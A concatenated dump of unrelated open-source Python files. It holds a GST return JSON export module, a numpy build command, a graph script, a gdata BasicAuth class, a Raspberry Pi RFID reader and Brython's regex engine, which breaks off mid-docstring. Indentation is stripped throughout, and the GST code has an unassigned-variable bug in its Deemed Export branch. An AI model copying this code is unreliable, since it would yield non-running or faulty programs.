{
"fieldname": "return_against",
"label": "Invoice/Advance Receipt Number",
"fieldtype": "Link",
"options": "Sales Invoice",
"width": 120
},
{
"fieldname": "posting_date",
"label": "Invoice/Advance Receipt date",
"fieldtype": "Data",
"width": 120
},
{
"fieldname": "invoice_number",
"label": "Invoice/Advance Receipt Number",
"fieldtype": "Link",
"options": "Sales Invoice",
"width":120
},
{
"fieldname": "reverse_charge",
"label": "Reverse Charge",
"fieldtype": "Data"
},
{
"fieldname": "export_type",
"label": "Export Type",
"fieldtype": "Data",
"hidden": 1
},
{
"fieldname": "reason_for_issuing_document",
"label": "Reason For Issuing document",
"fieldtype": "Data",
"width": 140
},
{
"fieldname": "place_of_supply",
"label": "Place Of Supply",
"fieldtype": "Data",
"width": 120
},
{
"fieldname": "gst_category",
"label": "GST Category",
"fieldtype": "Data"
},
{
"fieldname": "invoice_value",
"label": "Invoice Value",
"fieldtype": "Currency",
"width": 120
}
]
self.other_columns = [
{
"fieldname": "cess_amount",
"label": "Cess Amount",
"fieldtype": "Currency",
"width": 100
},
{
"fieldname": "pre_gst",
"label": "PRE GST",
"fieldtype": "Data",
"width": 80
},
{
"fieldname": "document_type",
"label": "Document Type",
"fieldtype": "Data",
"width": 80
}
]
elif self.filters.get("type_of_business") == "B2C Small":
self.invoice_columns = [
{
"fieldname": "place_of_supply",
"label": "Place Of Supply",
"fieldtype": "Data",
"width": 120
},
{
"fieldname": "ecommerce_gstin",
"label": "E-Commerce GSTIN",
"fieldtype": "Data",
"width": 130
}
]
self.other_columns = [
{
"fieldname": "cess_amount",
"label": "Cess Amount",
"fieldtype": "Currency",
"width": 100
},
{
"fieldname": "type",
"label": "Type",
"fieldtype": "Data",
"width": 50
}
]
elif self.filters.get("type_of_business") == "EXPORT":
self.invoice_columns = [
{
"fieldname": "export_type",
"label": "Export Type",
"fieldtype": "Data",
"width":120
},
{
"fieldname": "invoice_number",
"label": "Invoice Number",
"fieldtype": "Link",
"options": "Sales Invoice",
"width":120
},
{
"fieldname": "posting_date",
"label": "Invoice date",
"fieldtype": "Data",
"width": 120
},
{
"fieldname": "invoice_value",
"label": "Invoice Value",
"fieldtype": "Currency",
"width": 120
},
{
"fieldname": "port_code",
"label": "Port Code",
"fieldtype": "Data",
"width": 120
},
{
"fieldname": "shipping_bill_number",
"label": "Shipping Bill Number",
"fieldtype": "Data",
"width": 120
},
{
"fieldname": "shipping_bill_date",
"label": "Shipping Bill Date",
"fieldtype": "Data",
"width": 120
}
]
self.columns = self.invoice_columns + self.tax_columns + self.other_columns
@frappe.whitelist()
def get_json(filters, report_name, data):
filters = json.loads(filters)
report_data = json.loads(data)
gstin = get_company_gstin_number(filters["company"], filters["company_address"])
fp = "%02d%s" % (getdate(filters["to_date"]).month, getdate(filters["to_date"]).year)
gst_json = {"version": "GST2.2.9",
"hash": "hash", "gstin": gstin, "fp": fp}
res = {}
if filters["type_of_business"] == "B2B":
for item in report_data[:-1]:
res.setdefault(item["customer_gstin"], {}).setdefault(item["invoice_number"],[]).append(item)
out = get_b2b_json(res, gstin)
gst_json["b2b"] = out
elif filters["type_of_business"] == "B2C Large":
for item in report_data[:-1]:
res.setdefault(item["place_of_supply"], []).append(item)
out = get_b2cl_json(res, gstin)
gst_json["b2cl"] = out
elif filters["type_of_business"] == "B2C Small":
out = get_b2cs_json(report_data[:-1], gstin)
gst_json["b2cs"] = out
elif filters["type_of_business"] == "EXPORT":
for item in report_data[:-1]:
res.setdefault(item["export_type"], []).append(item)
out = get_export_json(res)
gst_json["exp"] = out
elif filters["type_of_business"] == 'CDNR-REG':
for item in report_data[:-1]:
res.setdefault(item["customer_gstin"], {}).setdefault(item["invoice_number"],[]).append(item)
out = get_cdnr_reg_json(res, gstin)
gst_json["cdnr"] = out
return {
'report_name': report_name,
'report_type': filters['type_of_business'],
'data': gst_json
}
def get_b2b_json(res, gstin):
inv_type, out = {"Registered Regular": "R", "Deemed Export": "DE", "URD": "URD", "SEZ": "SEZ"}, []
for gst_in in res:
b2b_item, inv = {"ctin": gst_in, "inv": []}, []
if not gst_in: continue
for number, invoice in iteritems(res[gst_in]):
if not invoice[0]["place_of_supply"]:
frappe.throw(_("""{0} not entered in Invoice {1}.
Please update and try again""").format(frappe.bold("Place Of Supply"),
frappe.bold(invoice[0]['invoice_number'])))
inv_item = get_basic_invoice_detail(invoice[0])
inv_item["pos"] = "%02d" % int(invoice[0]["place_of_supply"].split('-')[0])
inv_item["rchrg"] = invoice[0]["reverse_charge"]
inv_item["inv_typ"] = inv_type.get(invoice[0].get("gst_category", ""),"")
if inv_item["pos"]=="00": continue
inv_item["itms"] = []
for item in invoice:
inv_item["itms"].append(get_rate_and_tax_details(item, gstin))
inv.append(inv_item)
if not inv: continue
b2b_item["inv"] = inv
out.append(b2b_item)
return out
def get_b2cs_json(data, gstin):
company_state_number = gstin[0:2]
out = []
for d in data:
if not d.get("place_of_supply"):
frappe.throw(_("""{0} not entered in some invoices.
Please update and try again""").format(frappe.bold("Place Of Supply")))
pos = d.get('place_of_supply').split('-')[0]
tax_details = {}
rate = d.get('rate', 0)
tax = flt((d["taxable_value"]*rate)/100.0, 2)
if company_state_number == pos:
tax_details.update({"camt": flt(tax/2.0, 2), "samt": flt(tax/2.0, 2)})
else:
tax_details.update({"iamt": tax})
inv = {
"sply_ty": "INTRA" if company_state_number == pos else "INTER",
"pos": pos,
"typ": d.get('type'),
"txval": flt(d.get('taxable_value'), 2),
"rt": rate,
"iamt": flt(tax_details.get('iamt'), 2),
"camt": flt(tax_details.get('camt'), 2),
"samt": flt(tax_details.get('samt'), 2),
"csamt": flt(d.get('cess_amount'), 2)
}
if d.get('type') == "E" and d.get('ecommerce_gstin'):
inv.update({
"etin": d.get('ecommerce_gstin')
})
out.append(inv)
return out
def get_b2cl_json(res, gstin):
out = []
for pos in res:
if not pos:
frappe.throw(_("""{0} not entered in some invoices.
Please update and try again""").format(frappe.bold("Place Of Supply")))
b2cl_item, inv = {"pos": "%02d" % int(pos.split('-')[0]), "inv": []}, []
for row in res[pos]:
inv_item = get_basic_invoice_detail(row)
if row.get("sale_from_bonded_wh"):
inv_item["inv_typ"] = "CBW"
inv_item["itms"] = [get_rate_and_tax_details(row, gstin)]
inv.append(inv_item)
b2cl_item["inv"] = inv
out.append(b2cl_item)
return out
def get_export_json(res):
out = []
for exp_type in res:
exp_item, inv = {"exp_typ": exp_type, "inv": []}, []
for row in res[exp_type]:
inv_item = get_basic_invoice_detail(row)
inv_item["itms"] = [{
"txval": flt(row["taxable_value"], 2),
"rt": row["rate"] or 0,
"iamt": 0,
"csamt": 0
}]
inv.append(inv_item)
exp_item["inv"] = inv
out.append(exp_item)
return out
def get_cdnr_reg_json(res, gstin):
out = []
for gst_in in res:
cdnr_item, inv = {"ctin": gst_in, "nt": []}, []
if not gst_in: continue
for number, invoice in iteritems(res[gst_in]):
if not invoice[0]["place_of_supply"]:
frappe.throw(_("""{0} not entered in Invoice {1}.
Please update and try again""").format(frappe.bold("Place Of Supply"),
frappe.bold(invoice[0]['invoice_number'])))
inv_item = {
"nt_num": invoice[0]["invoice_number"],
"nt_dt": getdate(invoice[0]["posting_date"]).strftime('%d-%m-%Y'),
"val": abs(flt(invoice[0]["invoice_value"])),
"ntty": invoice[0]["document_type"],
"pos": "%02d" % int(invoice[0]["place_of_supply"].split('-')[0]),
"rchrg": invoice[0]["reverse_charge"],
"inv_type": get_invoice_type_for_cdnr(invoice[0])
}
inv_item["itms"] = []
for item in invoice:
inv_item["itms"].append(get_rate_and_tax_details(item, gstin))
inv.append(inv_item)
if not inv: continue
cdnr_item["nt"] = inv
out.append(cdnr_item)
return out
def get_invoice_type_for_cdnr(row):
if row.get('gst_category') == 'SEZ':
if row.get('export_type') == 'WPAY':
invoice_type = 'SEWP'
else:
invoice_type = 'SEWOP'
elif row.get('gst_category') == 'Deemed Export':
row.invoice_type = 'DE'
elif row.get('gst_category') == 'Registered Regular':
invoice_type = 'R'
return invoice_type
def get_basic_invoice_detail(row):
return {
"inum": row["invoice_number"],
"idt": getdate(row["posting_date"]).strftime('%d-%m-%Y'),
"val": flt(row["invoice_value"], 2)
}
def get_rate_and_tax_details(row, gstin):
itm_det = {"txval": flt(row["taxable_value"], 2),
"rt": row["rate"],
"csamt": (flt(row.get("cess_amount"), 2) or 0)
}
# calculate rate
num = 1 if not row["rate"] else "%d%02d" % (row["rate"], 1)
rate = row.get("rate") or 0
# calculate tax amount added
tax = flt((row["taxable_value"]*rate)/100.0, 2)
frappe.errprint([tax, tax/2])
if row.get("customer_gstin") and gstin[0:2] == row["customer_gstin"][0:2]:
itm_det.update({"camt": flt(tax/2.0, 2), "samt": flt(tax/2.0, 2)})
else:
itm_det.update({"iamt": tax})
return {"num": int(num), "itm_det": itm_det}
def get_company_gstin_number(company, address=None, all_gstins=False):
gstin = ''
if address:
gstin = frappe.db.get_value("Address", address, "gstin")
if not gstin:
filters = [
["is_your_company_address", "=", 1],
["Dynamic Link", "link_doctype", "=", "Company"],
["Dynamic Link", "link_name", "=", company],
["Dynamic Link", "parenttype", "=", "Address"],
]
gstin = frappe.get_all("Address", filters=filters, pluck="gstin")
if gstin and not all_gstins:
gstin = gstin[0]
if not gstin:
address = frappe.bold(address) if address else ""
frappe.throw(_("Please set valid GSTIN No. in Company Address {} for company {}").format(
address, frappe.bold(company)
))
return gstin
@frappe.whitelist()
def download_json_file():
''' download json content in a file '''
data = frappe._dict(frappe.local.form_dict)
frappe.response['filename'] = frappe.scrub("{0} {1}".format(data['report_name'], data['report_type'])) + '.json'
frappe.response['filecontent'] = data['data']
frappe.response['content_type'] = 'application/json'
frappe.response['type'] = 'download'
| gpl-3.0 |
BigDataforYou/movie_recommendation_workshop_1 | big_data_4_you_demo_1/venv/lib/python2.7/site-packages/numpy/distutils/command/build_py.py | 264 | 1210 | from __future__ import division, absolute_import, print_function
from distutils.command.build_py import build_py as old_build_py
from numpy.distutils.misc_util import is_string
class build_py(old_build_py):
def run(self):
build_src = self.get_finalized_command('build_src')
if build_src.py_modules_dict and self.packages is None:
self.packages = list(build_src.py_modules_dict.keys ())
old_build_py.run(self)
def find_package_modules(self, package, package_dir):
modules = old_build_py.find_package_modules(self, package, package_dir)
# Find build_src generated *.py files.
build_src = self.get_finalized_command('build_src')
modules += build_src.py_modules_dict.get(package, [])
return modules
def find_modules(self):
old_py_modules = self.py_modules[:]
new_py_modules = [_m for _m in self.py_modules if is_string(_m)]
self.py_modules[:] = new_py_modules
modules = old_build_py.find_modules(self)
self.py_modules[:] = old_py_modules
return modules
# XXX: Fix find_source_files for item in py_modules such that item is 3-tuple
# and item[2] is source file.
| mit |
kgilbert-cmu/bigs | families/visualize.py | 1 | 1098 | from optparse import OptionParser
import sys
import graph
def init_parser():
parser = OptionParser()
parser.add_option("-f", "--file", dest = "File", type = "string", help = "")
parser.add_option("-o", "--output", dest = "Output", type = "string", help = "")
(options, args) = parser.parse_args() # user input is stored in "options"
return options
def main():
options = init_parser()
if options.File == None:
print "Error: Did not specify input file."
sys.exit(1)
if options.Output == None:
print "Warning: Did not specify output file. Defaulting to 'image.pdf'"
options.Output = "image"
pairs = []
with open(options.File, 'r') as input_file:
for line in input_file:
pairs.append(line.strip())
mapping = {}
for p in pairs:
(parent, children) = p.split(":")
if parent not in mapping:
mapping[parent] = []
mapping[parent].extend(children.split(","))
image = graph.Graph(mapping)
image.render(options.Output)
if __name__ == "__main__":
main()
| mit |
barbarubra/Don-t-know-What-i-m-doing. | python/gdata/src/atom/auth.py | 297 | 1199 | #!/usr/bin/env python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module is used for version 2 of the Google Data APIs.
__author__ = 'j.s@google.com (Jeff Scudder)'
import base64
class BasicAuth(object):
"""Sets the Authorization header as defined in RFC1945"""
def __init__(self, user_id, password):
self.basic_cookie = base64.encodestring(
'%s:%s' % (user_id, password)).strip()
def modify_request(self, http_request):
http_request.headers['Authorization'] = 'Basic %s' % self.basic_cookie
ModifyRequest = modify_request
class NoAuth(object):
def modify_request(self, http_request):
pass
| apache-2.0 |
filemakergarage/zeroclient | f1/s/docker/rfidreader.py | 1 | 4418 | # f1/s/docker/rfidreader.py
# import time
from f1.s.docker.f1time import Time
from f1.s.docker.base_device import BaseDevice
from autobahn.wamp.message import Published
from twisted.internet.defer import inlineCallbacks
from autobahn.twisted.util import sleep
from autobahn.twisted.wamp import ApplicationSession
from autobahn.wamp.types import PublishOptions
class Reader(BaseDevice):
def __init__(self, architecture, platform, session_id, args):
super().__init__(architecture, platform, session_id)
self.direction = args[0]
self.id = args[1]
self.data_pin = int(args[2])
self.clock_pin = int(args[3])
self.bit_timeout = 6
self.test = ['11010000011100110000001000000100001000010000110000100000000'
'10000110000000011000011001100000010000001010001111101000',
'11010100001010110000001000000100001000010000100001010000000'
'11001100001001001000011001100001010100001100111111110000']
@inlineCallbacks
def onJoin(self, details):
super().onJoin(details)
if self.has_gpio:
try:
self.decode()
while True:
yield sleep(3)
except Exception as exc:
print('rfidreader.Decoder', exc)
self.publish('com.zc.log', exc.__cause__)
# return exc
finally:
self.cancel()
elif not self.has_gpio: # TODO and testing is True
yield self.generate_test_values()
@inlineCallbacks
def generate_test_values(self):
# while self.mission_go is False:
# time.sleep(1)
try:
# generate test values
value = self.make_value(self.test[0])
utc = Time.utc_now()
result = {'code': value, 'utc': utc, 'direction': self.direction, 'id': self.id}
self.publish('com.zc.auth_code', result)
print(result)
yield sleep(2)
value = self.make_value(self.test[1])
utc = Time.utc_now()
result = {'code': value, 'utc': utc, 'direction': self.direction, 'id': self.id}
self.publish('com.zc.auth_code', result)
print(result)
yield sleep(2)
except Exception as exc:
self.publish('com.zc.log', exc.__cause__)
return exc
def decode(self):
print('decode...')
import pigpio
self.in_code = False
self.pi.set_mode(self.data_pin, pigpio.INPUT)
self.pi.set_mode(self.clock_pin, pigpio.INPUT)
self.pi.set_pull_up_down(self.data_pin, pigpio.PUD_UP)
self.pi.set_pull_up_down(self.clock_pin, pigpio.PUD_UP)
self.cb_0 = self.pi.callback(self.data_pin, pigpio.EITHER_EDGE, self._cbf)
self.cb_1 = self.pi.callback(self.clock_pin, pigpio.FALLING_EDGE, self._cbf)
def _cbf(self, gpio, level, tick):
import pigpio
if level < pigpio.TIMEOUT:
if not self.in_code:
self.data_level = 0
self.bits = 0
self.in_code = True
self.code_timeout = 0
self.pi.set_watchdog(self.clock_pin, self.bit_timeout)
else:
if gpio == self.data_pin:
self.data_level = level
else: # clock rising edge
self.bits = int(self.bits)
self.bits = "{}{}".format(self.bits, self.data_level)
self.code_timeout = 0
else:
if self.in_code:
self.code_timeout = 1
self.pi.set_watchdog(self.clock_pin, 0)
self.in_code = False
value = self.make_value(self.bits)
utc = Time.utc_now()
result = {'code': value, 'utc': utc, 'id': self.id, 'direction': self.direction}
self.publish('com.zc.auth_code', result)
# self.send_auth_code_inline(result)
def cancel(self):
if self.cb_0:
self.cb_0.cancel()
if self.cb_1:
self.cb_1.cancel()
if self.pi is not None:
self.pi.stop()
@staticmethod
def make_value(bits):
length = len(str(bits))
assert length < 60, 'Error: len(auth_code) > 60 : {}'.format(length)
return bits
| mit |
40223234/w16b_test | static/Brython3.1.3-20150514-095342/Lib/_sre.py | 622 | 51369 | # NOT_RPYTHON
"""
A pure Python reimplementation of the _sre module from CPython 2.4
Copyright 2005 Nik Haldimann, licensed under the MIT license
This code is based on material licensed under CNRI's Python 1.6 license and
copyrighted by: Copyright (c) 1997-2001 by Secret Labs AB
"""
MAXREPEAT = 2147483648
#import array
import operator, sys
from sre_constants import ATCODES, OPCODES, CHCODES
from sre_constants import SRE_INFO_PREFIX, SRE_INFO_LITERAL
from sre_constants import SRE_FLAG_UNICODE, SRE_FLAG_LOCALE
import sys
# Identifying as _sre from Python 2.3 or 2.4
#if sys.version_info[:2] >= (2, 4):
MAGIC = 20031017
#else:
# MAGIC = 20030419
# In _sre.c this is bytesize of the code word type of the C implementation.
# There it's 2 for normal Python builds and more for wide unicode builds (large
# enough to hold a 32-bit UCS-4 encoded character). Since here in pure Python
# we only see re bytecodes as Python longs, we shouldn't have to care about the
# codesize. But sre_compile will compile some stuff differently depending on the
# codesize (e.g., charsets).
# starting with python 3.3 CODESIZE is 4
#if sys.maxunicode == 65535:
# CODESIZE = 2
#else:
CODESIZE = 4
copyright = "_sre.py 2.4c Copyright 2005 by Nik Haldimann"
def getcodesize():
return CODESIZE
def compile(pattern, flags, code, groups=0, groupindex={}, indexgroup=[None]):
"""Compiles (or rather just converts) a pattern descriptor to a SRE_Pattern
object. Actual compilation to opcodes happens in sre_compile."""
return SRE_Pattern(pattern, flags, code, groups, groupindex, indexgroup)
def getlower(char_ord, flags):
if (char_ord < 128) or (flags & SRE_FLAG_UNICODE) \
or (flags & SRE_FLAG_LOCALE and char_ord < 256):
#return ord(unichr(char_ord).lower())
return ord(chr(char_ord).lower())
else:
return char_ord
class SRE_Pattern:
def __init__(self, pattern, flags, code, groups=0, groupindex={}, indexgroup=[None]):
self.pattern = pattern
self.flags = flags
self.groups = groups
self.groupindex = groupindex # Maps group names to group indices
self._indexgroup = indexgroup # Maps indices to group names
self._code = code
def match(self, string, pos=0, endpos=sys.maxsize):
"""If zero or more characters at the beginning of string match this
regular expression, return a corresponding MatchObject instance. Return
None if the string does not match the pattern."""
state = _State(string, pos, endpos, self.flags)
if state.match(self._code):
return SRE_Match(self, state)
return None
def search(self, string, pos=0, endpos=sys.maxsize):
"""Scan through string looking for a location where this regular
expression produces a match, and return a corresponding MatchObject
instance. Return None if no position in the string matches the
pattern."""
state = _State(string, pos, endpos, self.flags)
if state.search(self._code):
return SRE_Match(self, state)
else:
return None
def findall(self, string, pos=0, endpos=sys.maxsize):
"""Return a list of all non-overlapping matches of pattern in string."""
matchlist = []
state = _State(string, pos, endpos, self.flags)
while state.start <= state.end:
state.reset()
state.string_position = state.start
if not state.search(self._code):
break
match = SRE_Match(self, state)
if self.groups == 0 or self.groups == 1:
item = match.group(self.groups)
else:
item = match.groups("")
matchlist.append(item)
if state.string_position == state.start:
state.start += 1
else:
state.start = state.string_position
return matchlist
def _subx(self, template, string, count=0, subn=False):
filter = template
if not callable(template) and "\\" in template:
# handle non-literal strings ; hand it over to the template compiler
#import sre #sre was renamed to re
#fix me brython
#print("possible issue at _sre.py line 116")
import re as sre
filter = sre._subx(self, template)
state = _State(string, 0, sys.maxsize, self.flags)
sublist = []
n = last_pos = 0
while not count or n < count:
state.reset()
state.string_position = state.start
if not state.search(self._code):
break
if last_pos < state.start:
sublist.append(string[last_pos:state.start])
if not (last_pos == state.start and
last_pos == state.string_position and n > 0):
# the above ignores empty matches on latest position
if callable(filter):
sublist.append(filter(SRE_Match(self, state)))
else:
sublist.append(filter)
last_pos = state.string_position
n += 1
if state.string_position == state.start:
state.start += 1
else:
state.start = state.string_position
if last_pos < state.end:
sublist.append(string[last_pos:state.end])
item = "".join(sublist)
if subn:
return item, n
else:
return item
def sub(self, repl, string, count=0):
"""Return the string obtained by replacing the leftmost non-overlapping
occurrences of pattern in string by the replacement repl."""
return self._subx(repl, string, count, False)
def subn(self, repl, string, count=0):
"""Return the tuple (new_string, number_of_subs_made) found by replacing
the leftmost non-overlapping occurrences of pattern with the replacement
repl."""
return self._subx(repl, string, count, True)
def split(self, string, maxsplit=0):
"""Split string by the occurrences of pattern."""
splitlist = []
state = _State(string, 0, sys.maxsize, self.flags)
n = 0
last = state.start
while not maxsplit or n < maxsplit:
state.reset()
state.string_position = state.start
if not state.search(self._code):
break
if state.start == state.string_position: # zero-width match
if last == state.end: # or end of string
break
state.start += 1
continue
splitlist.append(string[last:state.start])
# add groups (if any)
if self.groups:
match = SRE_Match(self, state)
splitlist.extend(list(match.groups(None)))
n += 1
last = state.start = state.string_position
splitlist.append(string[last:state.end])
return splitlist
def finditer(self, string, pos=0, endpos=sys.maxsize):
"""Return a list of all non-overlapping matches of pattern in string."""
#scanner = self.scanner(string, pos, endpos)
_list=[]
_m=self.scanner(string, pos, endpos)
_re=SRE_Scanner(self, string, pos, endpos)
_m=_re.search()
while _m:
_list.append(_m)
_m=_re.search()
return _list
#return iter(scanner.search, None)
def scanner(self, string, start=0, end=sys.maxsize):
return SRE_Scanner(self, string, start, end)
def __copy__(self):
raise TypeError("cannot copy this pattern object")
def __deepcopy__(self):
raise TypeError("cannot copy this pattern object")
class SRE_Scanner:
"""Undocumented scanner interface of sre."""
def __init__(self, pattern, string, start, end):
self.pattern = pattern
self._state = _State(string, start, end, self.pattern.flags)
def _match_search(self, matcher):
state = self._state
state.reset()
state.string_position = state.start
match = None
if matcher(self.pattern._code):
match = SRE_Match(self.pattern, state)
if match is None or state.string_position == state.start:
state.start += 1
else:
state.start = state.string_position
return match
def match(self):
return self._match_search(self._state.match)
def search(self):
return self._match_search(self._state.search)
class SRE_Match:
def __init__(self, pattern, state):
self.re = pattern
self.string = state.string
self.pos = state.pos
self.endpos = state.end
self.lastindex = state.lastindex
if self.lastindex < 0:
self.lastindex = None
self.regs = self._create_regs(state)
#statement below is not valid under python3 ( 0 <= None)
#if pattern._indexgroup and 0 <= self.lastindex < len(pattern._indexgroup):
if self.lastindex is not None and pattern._indexgroup and 0 <= self.lastindex < len(pattern._indexgroup):
# The above upper-bound check should not be necessary, as the re
# compiler is supposed to always provide an _indexgroup list long
# enough. But the re.Scanner class seems to screw up something
# there, test_scanner in test_re won't work without upper-bound
# checking. XXX investigate this and report bug to CPython.
self.lastgroup = pattern._indexgroup[self.lastindex]
else:
self.lastgroup = None
def _create_regs(self, state):
"""Creates a tuple of index pairs representing matched groups."""
regs = [(state.start, state.string_position)]
for group in range(self.re.groups):
mark_index = 2 * group
if mark_index + 1 < len(state.marks) \
and state.marks[mark_index] is not None \
and state.marks[mark_index + 1] is not None:
regs.append((state.marks[mark_index], state.marks[mark_index + 1]))
else:
regs.append((-1, -1))
return tuple(regs)
def _get_index(self, group):
if isinstance(group, int):
if group >= 0 and group <= self.re.groups:
return group
else:
if group in self.re.groupindex:
return self.re.groupindex[group]
raise IndexError("no such group")
def _get_slice(self, group, default):
group_indices = self.regs[group]
if group_indices[0] >= 0:
return self.string[group_indices[0]:group_indices[1]]
else:
return default
def start(self, group=0):
"""Returns the indices of the start of the substring matched by group;
group defaults to zero (meaning the whole matched substring). Returns -1
if group exists but did not contribute to the match."""
return self.regs[self._get_index(group)][0]
def end(self, group=0):
"""Returns the indices of the end of the substring matched by group;
group defaults to zero (meaning the whole matched substring). Returns -1
if group exists but did not contribute to the match."""
return self.regs[self._get_index(group)][1]
def span(self, group=0):
"""Returns the 2-tuple (m.start(group), m.end(group))."""
return self.start(group), self.end(group)
def expand(self, template):
"""Return the string obtained by doing backslash substitution and
resolving group references on template."""
import sre
return sre._expand(self.re, self, template)
def groups(self, default=None):
"""Returns a tuple containing all the subgroups of the match. The
default argument is used for groups that did not participate in the
match (defaults to None)."""
groups = []
for indices in self.regs[1:]:
if indices[0] >= 0:
groups.append(self.string[indices[0]:indices[1]])
else:
groups.append(default)
return tuple(groups)
def groupdict(self, default=None):
"""Return a dictionary containing all the named subgroups of the match.
The default argument is used for groups that did not participate in the
match (defaults to None)."""
groupdict = {}
for key, value in self.re.groupindex.items():
groupdict[key] = self._get_slice(value, default)
return groupdict
def group(self, *args):
"""Returns one or more subgroups of the match. Each argument is either a
group index or a group name."""
if len(args) == 0:
args = (0,)
grouplist = []
for group in args:
grouplist.append(self._get_slice(self._get_index(group), None))
if len(grouplist) == 1:
return grouplist[0]
else:
return tuple(grouplist)
def __copy__():
raise TypeError("cannot copy this pattern object")
def __deepcopy__():
raise TypeError("cannot copy this pattern object")
class _State:
def __init__(self, string, start, end, flags):
self.string = string
if start < 0:
start = 0
if end > len(string):
end = len(string)
self.start = start
self.string_position = self.start
self.end = end
self.pos = start
self.flags = flags
self.reset()
def reset(self):
self.marks = []
self.lastindex = -1
self.marks_stack = []
self.context_stack = []
self.repeat = None
def match(self, pattern_codes):
# Optimization: Check string length. pattern_codes[3] contains the
# minimum length for a string to possibly match.
# brython.. the optimization doesn't work
#if pattern_codes[0] == OPCODES["info"] and pattern_codes[3]:
# if self.end - self.string_position < pattern_codes[3]:
# #_log("reject (got %d chars, need %d)"
# # % (self.end - self.string_position, pattern_codes[3]))
# return False
dispatcher = _OpcodeDispatcher()
self.context_stack.append(_MatchContext(self, pattern_codes))
has_matched = None
while len(self.context_stack) > 0:
context = self.context_stack[-1]
has_matched = dispatcher.match(context)
if has_matched is not None: # don't pop if context isn't done
self.context_stack.pop()
return has_matched
def search(self, pattern_codes):
flags = 0
if pattern_codes[0] == OPCODES["info"]:
# optimization info block
# <INFO> <1=skip> <2=flags> <3=min> <4=max> <5=prefix info>
if pattern_codes[2] & SRE_INFO_PREFIX and pattern_codes[5] > 1:
return self.fast_search(pattern_codes)
flags = pattern_codes[2]
pattern_codes = pattern_codes[pattern_codes[1] + 1:]
string_position = self.start
if pattern_codes[0] == OPCODES["literal"]:
# Special case: Pattern starts with a literal character. This is
# used for short prefixes
character = pattern_codes[1]
while True:
while string_position < self.end \
and ord(self.string[string_position]) != character:
string_position += 1
if string_position >= self.end:
return False
self.start = string_position
string_position += 1
self.string_position = string_position
if flags & SRE_INFO_LITERAL:
return True
if self.match(pattern_codes[2:]):
return True
return False
# General case
while string_position <= self.end:
self.reset()
self.start = self.string_position = string_position
if self.match(pattern_codes):
return True
string_position += 1
return False
def fast_search(self, pattern_codes):
"""Skips forward in a string as fast as possible using information from
an optimization info block."""
# pattern starts with a known prefix
# <5=length> <6=skip> <7=prefix data> <overlap data>
flags = pattern_codes[2]
prefix_len = pattern_codes[5]
prefix_skip = pattern_codes[6] # don't really know what this is good for
prefix = pattern_codes[7:7 + prefix_len]
overlap = pattern_codes[7 + prefix_len - 1:pattern_codes[1] + 1]
pattern_codes = pattern_codes[pattern_codes[1] + 1:]
i = 0
string_position = self.string_position
while string_position < self.end:
while True:
if ord(self.string[string_position]) != prefix[i]:
if i == 0:
break
else:
i = overlap[i]
else:
i += 1
if i == prefix_len:
# found a potential match
self.start = string_position + 1 - prefix_len
self.string_position = string_position + 1 \
- prefix_len + prefix_skip
if flags & SRE_INFO_LITERAL:
return True # matched all of pure literal pattern
if self.match(pattern_codes[2 * prefix_skip:]):
return True
i = overlap[i]
break
string_position += 1
return False
def set_mark(self, mark_nr, position):
if mark_nr & 1:
# This id marks the end of a group.
# fix python 3 division incompatability
#self.lastindex = mark_nr / 2 + 1
self.lastindex = mark_nr // 2 + 1
if mark_nr >= len(self.marks):
self.marks.extend([None] * (mark_nr - len(self.marks) + 1))
self.marks[mark_nr] = position
def get_marks(self, group_index):
marks_index = 2 * group_index
if len(self.marks) > marks_index + 1:
return self.marks[marks_index], self.marks[marks_index + 1]
else:
return None, None
def marks_push(self):
self.marks_stack.append((self.marks[:], self.lastindex))
def marks_pop(self):
self.marks, self.lastindex = self.marks_stack.pop()
def marks_pop_keep(self):
self.marks, self.lastindex = self.marks_stack[-1]
def marks_pop_discard(self):
self.marks_stack.pop()
def lower(self, char_ord):
return getlower(char_ord, self.flags)
class _MatchContext:
def __init__(self, state, pattern_codes):
self.state = state
self.pattern_codes = pattern_codes
self.string_position = state.string_position
self.code_position = 0
self.has_matched = None
def push_new_context(self, pattern_offset):
"""Creates a new child context of this context and pushes it on the
stack. pattern_offset is the offset off the current code position to
start interpreting from."""
child_context = _MatchContext(self.state,
self.pattern_codes[self.code_position + pattern_offset:])
#print("_sre.py:517:pushing new context") #, child_context.has_matched)
#print(self.state.string_position)
#print(self.pattern_codes[self.code_position + pattern_offset:])
#print(pattern_offset)
self.state.context_stack.append(child_context)
return child_context
def peek_char(self, peek=0):
return self.state.string[self.string_position + peek]
def skip_char(self, skip_count):
self.string_position += skip_count
def remaining_chars(self):
return self.state.end - self.string_position
def peek_code(self, peek=0):
return self.pattern_codes[self.code_position + peek]
def skip_code(self, skip_count):
self.code_position += skip_count
def remaining_codes(self):
return len(self.pattern_codes) - self.code_position
def at_beginning(self):
return self.string_position == 0
def at_end(self):
return self.string_position == self.state.end
def at_linebreak(self):
return not self.at_end() and _is_linebreak(self.peek_char())
def at_boundary(self, word_checker):
if self.at_beginning() and self.at_end():
return False
that = not self.at_beginning() and word_checker(self.peek_char(-1))
this = not self.at_end() and word_checker(self.peek_char())
return this != that
class _RepeatContext(_MatchContext):
def __init__(self, context):
_MatchContext.__init__(self, context.state,
context.pattern_codes[context.code_position:])
self.count = -1
#print('569:repeat', context.state.repeat)
self.previous = context.state.repeat
self.last_position = None
class _Dispatcher:
DISPATCH_TABLE = None
def dispatch(self, code, context):
method = self.DISPATCH_TABLE.get(code, self.__class__.unknown)
return method(self, context)
def unknown(self, code, ctx):
raise NotImplementedError()
def build_dispatch_table(cls, code_dict, method_prefix):
if cls.DISPATCH_TABLE is not None:
return
table = {}
for key, value in code_dict.items():
if hasattr(cls, "%s%s" % (method_prefix, key)):
table[value] = getattr(cls, "%s%s" % (method_prefix, key))
cls.DISPATCH_TABLE = table
build_dispatch_table = classmethod(build_dispatch_table)
class _OpcodeDispatcher(_Dispatcher):
def __init__(self):
self.executing_contexts = {}
self.at_dispatcher = _AtcodeDispatcher()
self.ch_dispatcher = _ChcodeDispatcher()
self.set_dispatcher = _CharsetDispatcher()
def match(self, context):
"""Returns True if the current context matches, False if it doesn't and
